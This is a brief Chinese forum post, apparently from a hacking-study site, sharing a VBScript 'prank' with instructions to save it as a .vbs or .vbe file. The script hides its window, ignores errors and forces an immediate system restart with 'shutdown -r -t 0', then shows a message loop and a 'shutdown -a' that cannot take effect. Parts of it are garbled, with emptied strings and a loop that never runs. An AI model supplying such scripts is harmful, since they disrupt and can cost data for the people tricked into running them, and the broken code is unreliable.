那是VB程序的说。
_____________________________
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 0 -c """" ",0 ,true
dim a
do while(a <> "")
a = inputbox (" """" ","www.hackstudy.cn"," “”",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
loop
msgbox chr(13) + chr(13) + chr(13) + ""
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + ""
_____________________________________
大概就是这样了,,
用记事本记着上面的代码 然后TXT改成VBE或者VBS貌似都可以。
[ 此帖被盖盖。在2009-03-03 16:55重新编辑 ]